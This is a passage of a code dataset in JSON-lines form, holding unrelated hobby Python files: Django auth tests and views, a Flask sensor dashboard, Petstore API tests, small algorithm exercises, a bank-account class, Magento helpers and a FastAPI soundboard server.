User.objects.create(email=an_email)\n token = Token.objects.create(email=an_email)\n the_user = pwdlessBackend().authenticate(token.uid)\n self.assertEqual(the_user, existing_user)\n\n\nclass GetUserTest(TestCase):\n def test_get_user_by_email(self):\n User.objects.create(email=\"second_test@example.com\")\n existing_user = User.objects.create(email=\"test_user@example.com\")\n the_user = pwdlessBackend().get_user(email=\"test_user@example.com\")\n self.assertEqual(the_user, existing_user)\n\n def test_returns_None_if_no_user_email(self):\n the_user = pwdlessBackend().get_user(email=\"test_user@example.com\")\n self.assertIsNone(the_user)\n\n\n\n\n\n\n\n","repo_name":"Diego-MX/squash-app","sub_path":"accounts/tests/test_authentication.py","file_name":"test_authentication.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70400108722","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Click\n\nimport json\n\n# fakeDB = [{'date':\"02-02-2021\", 'time':\"05:45:32\", 'x':1, 'y':2, 'hue':255}]\n\n@csrf_exempt\ndef index(request):\n return HttpResponse(\"heellloooOOOOOOO\")\n\n@csrf_exempt\ndef all(request):\n allClicks = list(Click.objects.values())\n # print(allClicks)\n # return JsonResponse(fakeDB, safe=False, status=200)\n return JsonResponse(allClicks, safe=False, status=200)\n\n@csrf_exempt\ndef new(request):\n errorMessage = validInput(request)\n if len(errorMessage) > 0:\n error = {}\n error[\"message\"] = errorMessage\n return JsonResponse(error, status=400)\n\n data = request.body.decode('utf-8')\n data_json = json.loads(data)\n\n click = Click(x=data_json['x'], y=data_json['y'],hue=data_json['hue'])\n click.save()\n # newData = {'date':\"\", 'time':\"\", 'x':data_json['x'], 'y':data_json['y'], 'hue':data_json['hue']}\n # fakeDB.append(newData)\n # print(fakeDB)\n return HttpResponse(\"added!\")\n\ndef validInput(request):\n if request.method == 'POST':\n data = request.body.decode('utf-8')\n data_json = json.loads(data)\n\n if len(data) == 0:\n return \"fields cannot be empty.\"\n requestFields = data_json.keys()\n expectedFields = [\"x\", \"y\", \"hue\"]\n diff = requestFields - expectedFields\n if len(diff) > 0:\n badField = diff.pop()\n # return error message about bad field\n return badField + \" not recognized.\"\n\n # check for empty field value\n for field in requestFields:\n if data_json[field] is None or data_json[field] == \"\":\n return field + \" cannot be empty.\"\n \n else:\n return \"not post request\"\n \n # no errors\n return \"\"","repo_name":"avelaga/connected_world_api","sub_path":"connected_world_api/clicks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16624035242","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_socketio import SocketIO\nimport Adafruit_DHT\nimport time\nimport datetime\nimport threading\nimport requests\nfrom config import API_KEY\n\nAPI_URL = \"http://api.weatherapi.com/v1/current.json\"\n\ncurrent_city = \"Vancouver\"\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\nsensor = Adafruit_DHT.DHT22\ngpio_pin = 4\n\ntemperature = 0.0\nhumidity = 0.0\ncurrent_time = datetime.datetime.now()\n\nsensor_thread_running = True\nconnected_clients = set()\n\n\ndef 
read_sensor():\n global temperature, humidity, current_time, sensor_thread_running\n while sensor_thread_running:\n # Read temperature and humidity data from the sensor\n new_humidity, new_temperature = Adafruit_DHT.read_retry(sensor, gpio_pin, delay_seconds=0.1)\n \n # Update the global variables only if the data retrieval was successful\n if new_humidity is not None and new_temperature is not None:\n temperature = new_temperature\n humidity = new_humidity\n current_time = datetime.datetime.now()\n \n # Wait for some time before taking the next reading (e.g., 2 seconds)\n time.sleep(2)\n\ndef get_weather_data(city):\n params = {\n \"key\" : API_KEY,\n \"q\" : city\n }\n try:\n # Send GET request to the API\n response = requests.get(API_URL, params=params)\n response.raise_for_status() # Raise an exception for unsuccessful requests\n data = response.json()\n \n # Extract relevant weather information from the response\n temperature = data[\"current\"][\"temp_c\"]\n humidity = data[\"current\"][\"humidity\"]\n\n # Display the weather information\n return {\"city_temp\" :temperature,\n \"city_humid\" : humidity}\n\n except requests.exceptions.RequestException as e:\n print(f\"Error occurred: {e}\")\n\n\ndef background_task():\n while sensor_thread_running:\n if connected_clients:\n data = {'temperature':temperature, 'humidity': humidity, **get_weather_data(current_city)}\n socketio.emit('update_data', data, namespace='/data')\n socketio.sleep(2)\n\n@socketio.on('connect', namespace='/data')\ndef handle_connect():\n connected_clients.add(request.sid)\n\n@socketio.on('disconnect', namespace='/data')\ndef handle_disconnect():\n connected_clients.remove(request.sid)\n\n@app.route('/api/data')\ndef get_data():\n data = {\n 'temperature': temperature,\n 'humidity': humidity,\n 'time' : current_time\n }\n return jsonify(data)\n\n@app.route('/')\ndef index():\n return render_template('index.html', temperature=temperature, humidity=humidity)\n\n\nif __name__ == '__main__':\n sensor_thread = threading.Thread(target=read_sensor)\n sensor_thread.start()\n\n socketio.start_background_task(target=background_task)\n try:\n socketio.run(app,host='0.0.0.0', port=5000)\n finally:\n sensor_thread_running = False\n sensor_thread.join()","repo_name":"tokiimugi/pi_temp_humid","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34750912133","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nplt.axis('equal')\n\n#PLOT ENVIRONMENT\nplt.plot([0, 0, 1, 1, 0], [0, 1, 1, 0, 0], marker='', color='black', linewidth=2) \n\n#PLOT OBSTACLES \nplt.plot([0.3, 0.3, 0.7, 0.7, 0.3], [0.2, 0.0, 0.0, 0.2, 0.2], marker='', color='olive', linewidth=2) \nplt.plot([0.4, 0.4, 0.6, 0.6, 0.4], [1.0, 0.7, 0.7, 1.0, 1.0], marker='', color='olive', linewidth=2) \n\n#PLOT GOAL REGIONS \nplt.plot([0.1, 0.1, 0.3, 0.1], [0.9, 0.7, 0.7, 0.9], marker='', color='blue', linewidth=2) \n#plt.plot([0.7, 0.7, 0.9, 0.7], [0.9, 0.7, 0.7, 0.9], marker='', color='blue', linewidth=2) \n#plt.plot([0.7, 0.7, 0.9, 0.7], [0.5, 0.3, 0.3, 0.5], marker='', color='blue', linewidth=2) \n#plt.plot([0.3, 0.3, 0.5, 0.3], [0.5, 0.3, 0.3, 0.5], marker='', color='blue', linewidth=2) \n\n#OPEN PATH FILE & PLOT PATHS\nfile = open('paths.txt', 'r') \n\nwhile True: \n\tline = file.readline()\n\tif not line: break;\n\n\tline = line.rstrip(' \\n')\n\tx = line.split(' ')\n\tx = map(float,x)\n\n\tline = file.readline()\n\tline = 
line.rstrip(' \\n')\n\ty = line.split(' ')\n\ty = map(float,y)\n\n\tplt.plot(x, y, marker='', color='red', linewidth=0.5) \n\n#PLOT INIT\nplt.plot( x[-1], y[-1], marker='o', markerfacecolor='red', markersize=2)\n\n#SHOW PLOT & SAVE\nfig = plt.gcf()\nfig.savefig('plot.png')\nplt.show()","repo_name":"savini-prem/RRTstar","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"16645313062","text":"import json\nimport requests\nimport os\n\n\ndef test_create_user(): # Verify that allows creating a User\n\n url = \"https://petstore.swagger.io/v2/user\"\n payload = json.dumps({\n \"id\": 160911,\n \"username\": \"test\",\n \"firstName\": \"test\",\n \"lastName\": \"test\",\n \"email\": \"test@mailinator.com\",\n \"password\": \"password\",\n \"phone\": \"777-77-77\",\n \"userStatus\": 0\n })\n headers = {\n 'Content-Type': 'application/json'\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\n# Verify that allows login as a User\ndef test_login(): # Verify that allows creating a User\n\n url = \"https://petstore.swagger.io/v2/user/login?username=test&password=password\"\n\n payload = \"\"\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\ndef test_create_list_user(): # Verify that allows creating the list of Users\n url = \"https://petstore.swagger.io/v2/user/createWithList\"\n\n payload = json.dumps([\n {\n \"id\": 0,\n \"username\": \"test1\",\n \"firstName\": \"test1\",\n \"lastName\": \"test1\",\n \"email\": \"test1\",\n \"password\": \"test1\",\n \"phone\": \"test1\",\n \"userStatus\": 0\n },\n {\n \"id\": 2,\n \"username\": \"test1\",\n \"firstName\": \"test1\",\n \"lastName\": \"test1\",\n \"email\": \"test1\",\n \"password\": \"test1\",\n \"phone\": \"test1\",\n \"userStatus\": 0\n }\n ])\n headers = {\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\ndef test_log_out(): # Verify that allows Log out User\n url = \"https://petstore.swagger.io/v2/user/logout\"\n\n payload = \"\"\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\ndef test_add_pet(): # Verify that allows adding a new Pet\n url = \"https://petstore.swagger.io/v2/pet\"\n\n payload = json.dumps({\n \"id\": 1232,\n \"category\": {\n \"id\": 1233,\n \"name\": \"string\"\n },\n \"name\": \"doggie\",\n \"photoUrls\": [\n \"string\"\n ],\n \"tags\": [\n {\n \"id\": 0,\n \"name\": \"string\"\n }\n ],\n \"status\": \"available\"\n })\n headers = {\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\ndef test_update_pet_image(): # Verify that allows updating Pet’s image\n url = \"https://petstore.swagger.io/v2/pet/1232/uploadImage\"\n current_directory = os.getcwd()\n file_path = os.path.join(current_directory, 'files_for_test', 'images', 'download.jfif')\n payload = {}\n files = [\n ('file', ('download.jfif', open(file_path, 'rb'), 
'application/octet-stream'))\n ]\n headers = {\n 'api_key': 'api_key'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\n# def test_update_data():# Verify that allows updating Pet’s name and status\n url = \"https://petstore.swagger.io/v2/pet/1232\"\n\n payload = {'name': ' totos',\n 'status': ' busy'}\n files = [\n\n ]\n headers = {}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\ndef test_delete_pet(): # Verify that allows deleting Pet\n url = \"https://petstore.swagger.io/v2/pet/1232\"\n\n payload = {}\n files = {}\n headers = {\n 'api_key': 'api_key'\n }\n\n response = requests.request(\"DELETE\", url, headers=headers, data=payload, files=files)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\n","repo_name":"Dmitry614/automation_learning","sub_path":"Automation_home_task/test_3.py","file_name":"test_3.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74093394481","text":"'''\nPartition a list into sublists whose sums don't exceed a maximum \n using a First Fit Decreasing algorithm. See\n http://www.ams.org/new-in-math/cover/bins1.html\n for a simple description of the method.\n'''\n\n\nclass Bin(object):\n \"\"\" Container for items that keeps a running sum \"\"\"\n def __init__(self):\n self.items = []\n self.sum = 0\n\n def append(self, item):\n self.items.append(item)\n self.sum += item\n\n def __str__(self):\n \"\"\" Printable representation \"\"\"\n return 'Bin(sum=%d, items=%s)' % (self.sum, str(self.items))\n\n\ndef pack(values, maxValue):\n values = sorted(values, reverse=True)\n bins = []\n\n for item in values:\n # Try to fit item into a bin\n for bin in bins:\n if bin.sum + item <= maxValue:\n #print 'Adding', item, 'to', bin\n bin.append(item)\n break\n else:\n # item didn't fit into any bin, start a new bin\n #print 'Making new bin for', item\n bin = Bin()\n bin.append(item)\n bins.append(bin)\n\n return bins\n\n\nif __name__ == '__main__':\n import random\n\n def packAndShow(aList, maxValue):\n \"\"\" Pack a list into bins and show the result \"\"\"\n print('List with sum ' + str(sum(aList)) + ' requires at least ' \\\n + str((sum(aList)+maxValue-1)/maxValue) + ' bins')\n\n bins = pack(aList, maxValue)\n\n print('Solution using' + str(len(bins)) + 'bins:')\n for bin in bins:\n print(str(bin))\n\n print\n\n\n aList = [10,9,8,7,6,5,4,3,2,1]\n packAndShow(aList, 11)\n\n aList = [ random.randint(1, 11) for i in range(100) ]\n packAndShow(aList, 11)\n\n","repo_name":"bpayne7/2D-Bin-Packing","sub_path":"ams.py","file_name":"ams.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"10441858410","text":"# Closest String\r\n# https://www.codewars.com/kata/6051151d86bab8001c83cc52/train/python\r\n\r\n# 정해진 시간안에 풀지 못했다.\r\n# 다른 사람의 풀이\r\nfrom itertools import product\r\ndef closest_string0(lst):\r\n maxHamDist = lambda w: max(sum(a!=b for a,b in zip(w,s)) for s in lst)\r\n return min( map(''.join, product(*map(set, zip(*lst))) ), key=maxHamDist )\r\n\r\n# 이해하기 쉬운 버전을 조금 수정했다.\r\nfrom collections import Counter\r\ndef closest_string(list_str):\r\n counters = [Counter(i) for i in 
zip(*list_str)]\r\n minweight = len(list_str[0]) + 1\r\n mins = None\r\n\r\n # backtracking with prunning:\r\n def rec(s, weights):\r\n nonlocal minweight, mins\r\n if max(weights) >= minweight:\r\n return\r\n if len(s) == len(list_str[0]):\r\n mins = s\r\n minweight = max(weights)\r\n return\r\n\r\n for c in counters[len(s)].keys():\r\n rec(s + c, [\r\n prevw + (c != list_str[i][len(s)])\r\n for i, prevw in enumerate(weights)\r\n ])\r\n\r\n rec('', [0]*len(list_str))\r\n return mins\r\n\r\ndef hamming_distance(str1, str2):\r\n l = 0\r\n for i in range(0, len(str2)):\r\n if str1[i] != str2[i]:\r\n l += 1\r\n return l\r\n\r\n\r\ndef compare(test_case_lists, str1, str2):\r\n distance1 = 0\r\n distance2 = 0\r\n if type(str1) != str:\r\n print('You did not return a string')\r\n elif len(str1) != len(str2):\r\n print('Length of string is invalid')\r\n else:\r\n for i in test_case_lists:\r\n distance1 = max(hamming_distance(str1, i), distance1)\r\n distance2 = max(hamming_distance(str2, i), distance2)\r\n print(distance1, distance2, 'Your maximum hamming distance is: ' + str(\r\n distance1) + ' with \\'' + str1 + '\\'\\nwhile the solution maximum is: ' + str(\r\n distance2) + ' with \\'' + str2 + '\\'\\n')\r\n\r\n\r\nl1 = ['ooi',\r\n 'oio',\r\n 'ooi']\r\nus = closest_string(l1.copy())\r\ncompare(l1, us, 'ooo')\r\nl2 = ['uvwx',\r\n 'xuwv',\r\n 'xvwu']\r\nus = closest_string(l2.copy())\r\ncompare(l2, us, 'uuwu')","repo_name":"whyj107/CodeWar","sub_path":"20230504_Closest String.py","file_name":"20230504_Closest String.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26871643965","text":"\nclass BankAccount:\n all_accounts = []\n # don't forget to add some default values for these parameters!\n def __init__(self, int_rate, balance): \n self.int_rate = int_rate\n self.balance = balance\n BankAccount.all_accounts.append(self)\n\n def deposit(self, amount):\n self.balance += amount\n return self\n\n def withdraw(self, amount):\n if self.balance < amount:\n print(\"Insufficient funds: Charging a $5 fee\")\n self.balance -= amount + 5\n return self\n else:\n self.balance -= amount\n return self\n\n def display_account_info(self):\n return f\"Balance: {self.balance}\"\n\n def yield_interest(self):\n self.balance = self.balance - (self.balance * self.int_rate)\n return self\n\n @classmethod\n def get_all_instances(cls):\n counter = 1\n account_list = \"-\"*50+\"\\n\"\n for account in cls.all_accounts:\n account_list += f\"account {counter}\\n\"\n account_list += f\" Interest Rate: {account.int_rate}\\n Balance: {account.balance}\\n\"\n counter += 1\n account_list += \"-\"*50+\"\\n\"*2\n return account_list\n\nclass User:\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.account = {\"checking\": BankAccount(0.02, 0),\"savings\": BankAccount(0.05, 600)}\n\n def make_deposit(self,account_name,amount):\n self.account[account_name].deposit(amount)\n return self\n\n def make_withdrawl(self,account_name,amount):\n self.account[account_name].withdraw(amount)\n return self\n\n def display_user_balance(self,account_name):\n print(f\"{self.name}'s Current {account_name} Balance is: {self.account[account_name].balance}\")\n return self\n\n def transfer_money(self,amount,other_user,account_name):\n self.account[account_name].balance -= amount\n other_user.account[account_name].balance += amount\n print(f\"You transferred {amount} to {other_user.name}!\")\n return self\n\n\n# 
account_1 = BankAccount(0.1, 0)\n# account_2 = BankAccount(0.15, 0)\n# account_3 = BankAccount(0.12, 0)\n\nperson_1 = User(\"Jerry\", \"jerry@email.com\")\nperson_2 = User(\"Alex\", \"alex@email.com\")\n\n# print(\"A\"*50)\n\n# print(account_1.deposit(50).deposit(100).deposit(85).withdraw(200).yield_interest().display_account_info())\n\n# print(account_2.deposit(100).deposit(150).withdraw(50).withdraw(100).withdraw(50).withdraw(55).yield_interest().display_account_info())\n\n# print(account_3.deposit(200).deposit(130).withdraw(50).withdraw(130).withdraw(50).withdraw(30).yield_interest().display_account_info())\n\n# print(\"B\"*50)\n\n# print(BankAccount.get_all_instances())\n\n# print(\"C\"*50)\n\nperson_1.make_deposit(\"checking\",500).display_user_balance(\"savings\")\nprint(\"A\"*50)\nperson_1.make_deposit(\"checking\",500).make_deposit(\"savings\",500).display_user_balance(\"savings\").display_user_balance(\"checking\")\nprint(\"B\"*50)\nperson_1.transfer_money(50,person_2,\"checking\")\nperson_2.display_user_balance(\"checking\")\n\n\n\n","repo_name":"xvaldez0411/python","sub_path":"fundamentals/oop/assignment_users_with_Bank_accounts/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9623759325","text":"#!/usr/bin/python3\n\"\"\"Defines a base class for the Almost a Circle project\"\"\"\n\n\nimport json\n\n\nclass Base:\n \"\"\"The superclass of the Almost a circle project\"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"Initializes the Base class\n\n Args:\n id: The identification for class initialization\n \"\"\"\n\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\" Returns the JSON string representation of a list of dictionaries\"\"\"\n if list_dictionaries is None or len(list_dictionaries) == 0:\n return []\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\" Writes the JSON string representation of list_objs to a file\n\n Args:\n list_objs (list): A list of instances that inherit from Base\n \"\"\"\n with open(cls.__name__ + '.json', mode='w') as f:\n if list_objs is None:\n f.write(\"[]\")\n else:\n json_list = []\n for obj in list_objs:\n json_list.append(obj.to_dictionary())\n if len(json_list) > 0:\n f.write(Base.to_json_string(json_list))\n\n def from_json_string(json_string):\n \"\"\" Returns the list of the JSON string representation json_string\n\n Args:\n json_string: The string to be deserialized\n \"\"\"\n if json_string is None or json_string == \"[]\":\n return []\n else:\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"Returns an instance with all attributes already set\n\n Args:\n dictionary (dict): A dictionary of an instance's attributes and\n value\n \"\"\"\n if dictionary and dictionary != {}:\n if cls.__name__ == \"Rectangle\":\n obj = cls(1, 1)\n elif cls.__name__ == \"Square\":\n obj = cls(1)\n obj.update(**dictionary)\n return obj\n\n @classmethod\n def load_from_file(cls):\n \"\"\"Return a list of instances\n\n Returns:\n An empty list if the file doesn't exist.\n Otherwise - a list of instantiated classes.\n \"\"\"\n filename = str(cls.__name__) + \".json\"\n try:\n with open(filename, \"r\") as f:\n list_dicts = Base.from_json_string(f.read())\n return [cls.create(**d) for d in list_dicts]\n except 
IOError:\n return []\n","repo_name":"Wa2hingt0n/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1676205580","text":"# -*- coding: UTF-8 -*-\n'''\n magento.utils\n\n General purpose utility functions\n\n :license: BSD, see LICENSE for more details\n'''\nimport re\n\n\ndef expand_url(url, protocol):\n \"\"\"\n Expands the given URL to a full URL by adding\n the magento soap/wsdl parts\n\n :param url: URL to be expanded\n :param service: 'xmlrpc' or 'soap'\n \"\"\"\n if protocol == 'soap':\n ws_part = 'api/?wsdl'\n elif protocol == 'xmlrpc':\n ws_part = 'index.php/api/xmlrpc'\n else:\n ws_part = 'index.php/rest/V1'\n return url.endswith('/') and url + ws_part or url + '/' + ws_part\n\n\ndef camel_2_snake(name):\n \"Converts CamelCase to camel_case\"\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n","repo_name":"hanbiji/el_addons","sub_path":"magento_el/magento/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"70477571123","text":"import logging\nimport os\nimport secrets\nimport shutil\nimport sys\nfrom dataclasses import asdict, dataclass, field\nfrom glob import glob\n\nimport pkg_resources\nimport ujson\nimport uvicorn\nfrom fastapi import Depends, FastAPI, HTTPException, Request, status\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nfrom fastapi.staticfiles import StaticFiles\n\nfrom simple_soundboard.mqtt_api import MQTTAPI\nfrom simple_soundboard.sound_engine import SoundEngine\n\nlogging.basicConfig(format=\"%(levelname)s: %(message)s\", level=logging.INFO)\nlogger = logging.getLogger()\n\nCONFIG_FOLDER = os.path.expanduser(\"~\") + \"/simple_soundboard/\"\nMEDIA_FOLDER = os.path.expanduser(\"~\") + \"/simple_soundboard/media/\"\nCONFIG_FILE = CONFIG_FOLDER + \"config.json\"\n\n\n@dataclass\nclass FileInfo:\n filename: str\n display_name: str = \"\"\n volume: float = 0.5\n is_music: bool = False\n is_folder: bool = False\n loop_playback: bool = False\n mqtt_topic: str = None\n icon: str = \"\"\n\n\n@dataclass\nclass FolderInfo:\n content: list[FileInfo] = field(default_factory=list)\n\n\nif not os.path.exists(CONFIG_FILE):\n os.makedirs(CONFIG_FOLDER, exist_ok=True)\n shutil.copy2(pkg_resources.resource_filename(__name__, \"config.json\"), CONFIG_FILE)\n\nif not os.path.exists(MEDIA_FOLDER):\n os.makedirs(MEDIA_FOLDER, exist_ok=True)\n\n\nsound_engine = SoundEngine()\nmqtt_api = MQTTAPI()\n\nsecurity = HTTPBasic()\napp = FastAPI()\napp.mount(\n \"/static\",\n StaticFiles(directory=pkg_resources.resource_filename(__name__, \"static\")),\n name=\"static\",\n)\n\n\ndef get_config():\n \"\"\"\n Returns config\n \"\"\"\n with open(CONFIG_FILE, \"r\", encoding=\"utf-8\") as file:\n config = file.read()\n file.close()\n return ujson.loads(config)\n\n\ndef init_folder_info_file(info_file_path):\n \"\"\"\n Init a folder content file\n \"\"\"\n with open(info_file_path, \"w\") as f:\n f.write(ujson.dumps(asdict(FolderInfo())))\n\n\ndef mqtt_enabled():\n mqtt_config = get_config()[\"mqtt\"]\n return bool(mqtt_config[\"mqtt_api_enabled\"])\n\n\ndef get_folder_info(relative_folder_path) -> FolderInfo:\n \"\"\"\n Returns 
folder info\n \"\"\"\n folder_info_file = f\"{MEDIA_FOLDER}{relative_folder_path}/folder_info.json\"\n\n if not os.path.exists(folder_info_file):\n init_folder_info_file(folder_info_file)\n try:\n with open(folder_info_file, \"r\") as f:\n folder_info = FolderInfo(**ujson.loads(f.read()))\n for i in range(len(folder_info.content)):\n folder_info.content[i] = FileInfo(**folder_info.content[i])\n except (ValueError, TypeError):\n folder_info = FolderInfo()\n save_folder_info(relative_folder_path, folder_info)\n\n return folder_info\n\n\ndef save_folder_info(relative_folder_path, folder_info):\n folder_info_file = f\"{MEDIA_FOLDER}{relative_folder_path}/folder_info.json\"\n with open(folder_info_file, \"w\") as f:\n f.write(ujson.dumps(asdict(folder_info), indent=4))\n f.close()\n\n\ndef get_current_username(credentials: HTTPBasicCredentials = Depends(security)):\n config = get_config()\n username_test = secrets.compare_digest(credentials.username, config[\"username\"])\n password_test = secrets.compare_digest(credentials.password, config[\"password\"])\n credential_test = username_test and password_test\n\n if not credential_test:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect login credentials\",\n headers={\"WWW-Authenticate\": \"Basic\"},\n )\n return credentials.username\n\n\n@app.get(\"/api/get_config\")\nasync def api_get_config(username: str = Depends(get_current_username)):\n \"\"\"\n Returns config\n \"\"\"\n config = get_config()\n return JSONResponse(config)\n\n\n@app.post(\"/api/get_folder_info\")\nasync def api_get_folder_info(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Returns folder info\n \"\"\"\n current_folder = await request.json()\n current_folder = current_folder[\"current_folder\"]\n\n config = get_folder_info(current_folder)\n initial_config = ujson.dumps(asdict(config))\n all_files = glob(f\"{MEDIA_FOLDER}{current_folder}/*\", recursive=False)\n\n for f in all_files:\n filename = f.split(MEDIA_FOLDER)[1]\n if any([x.filename == filename for x in config.content]):\n continue\n\n is_folder = os.path.isdir(f)\n\n if is_folder:\n config.content.append(FileInfo(filename, is_folder=True, icon=\"folder\"))\n else:\n extension = os.path.splitext(f)[1]\n if extension not in [\".mp3\", \".ogg\", \".wav\"]:\n continue\n config.content.append(FileInfo(filename))\n\n filtered_folder_info = FolderInfo()\n for file in config.content:\n if os.path.dirname(file.filename) != current_folder:\n continue\n if not os.path.exists(f\"{MEDIA_FOLDER}{file.filename}\"):\n continue\n if any([x.filename == file.filename for x in filtered_folder_info.content]):\n continue\n filtered_folder_info.content.append(file)\n\n final_config = ujson.dumps(asdict(filtered_folder_info))\n if initial_config != final_config:\n save_folder_info(current_folder, filtered_folder_info)\n\n return JSONResponse(asdict(filtered_folder_info))\n\n\n@app.post(\"/api/upload_file\")\nasync def api_upload_file(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Upload a file\n \"\"\"\n data = await request.body()\n filename = request.headers.get(\"filename\")\n current_folder = request.headers.get(\"current_folder\")\n\n extension = os.path.splitext(filename)[1]\n if extension not in [\".mp3\", \".ogg\", \".wav\"]:\n return JSONResponse({\"success\": False})\n\n with open(f\"{MEDIA_FOLDER}{current_folder}/{filename}\", \"wb\") as f:\n f.write(data)\n f.close()\n\n return JSONResponse({\"success\": 
True})\n\n\n@app.post(\"/api/delete_file\")\nasync def api_delete_file(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Delete a file\n \"\"\"\n file_info = await request.json()\n file_info = FileInfo(**file_info[\"file\"])\n if file_info.is_folder:\n shutil.rmtree(f\"{MEDIA_FOLDER}{file_info.filename}\")\n else:\n os.remove(f\"{MEDIA_FOLDER}{file_info.filename}\")\n\n return JSONResponse({\"success\": True})\n\n\n@app.post(\"/api/create_new_folder\")\nasync def api_create_new_folder(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Create a new folder\n \"\"\"\n file_info = await request.json()\n os.makedirs(f\"{MEDIA_FOLDER}{file_info['new_folder_name']}\", exist_ok=True)\n\n return JSONResponse({\"success\": True})\n\n\ndef api_play_sound(file_info: FileInfo):\n \"\"\"\n Plays a sound defined by FileInfo\n \"\"\"\n if mqtt_enabled() and file_info.mqtt_topic not in [\"\", None]:\n mqtt_api.mqtt.publish(f\"simple_soundboard/playing/{file_info.mqtt_topic}\")\n\n if file_info.is_music:\n sound_engine.play_music(\n f\"{MEDIA_FOLDER}{file_info.filename}\", file_info.volume, file_info.loop_playback\n )\n else:\n sound_engine.play_sound(f\"{MEDIA_FOLDER}{file_info.filename}\", file_info.volume)\n\n\n@app.post(\"/api/play_sound\")\nasync def web_ui_play_sound(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Plays a sound\n \"\"\"\n file_info = await request.json()\n file_info = FileInfo(**file_info[\"file\"])\n api_play_sound(file_info)\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/stop_sounds\")\nasync def api_stop_sounds(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Stops all playing sounds\n \"\"\"\n if mqtt_enabled():\n mqtt_api.mqtt.publish(\"simple_soundboard/stopped_sounds\")\n sound_engine.stop_sounds()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/stop_all\")\nasync def api_stop_all(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Stops all playing sounds\n \"\"\"\n if mqtt_enabled():\n mqtt_api.mqtt.publish(\"simple_soundboard/stopped_all\")\n sound_engine.stop_all()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/fadeout_music\")\nasync def api_fadeout_music(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Fadeout Music\n \"\"\"\n sound_engine.fadeout_music()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/pause_music\")\nasync def api_pause_music(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Pause Music\n \"\"\"\n sound_engine.pause_music()\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/resume_music\")\nasync def api_resume_music(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Resume (unpause) Music\n \"\"\"\n sound_engine.resume_music()\n return JSONResponse({\"success\": True})\n\n\n@app.post(\"/api/save_folder_info\")\nasync def api_save_folder_info(request: Request, username: str 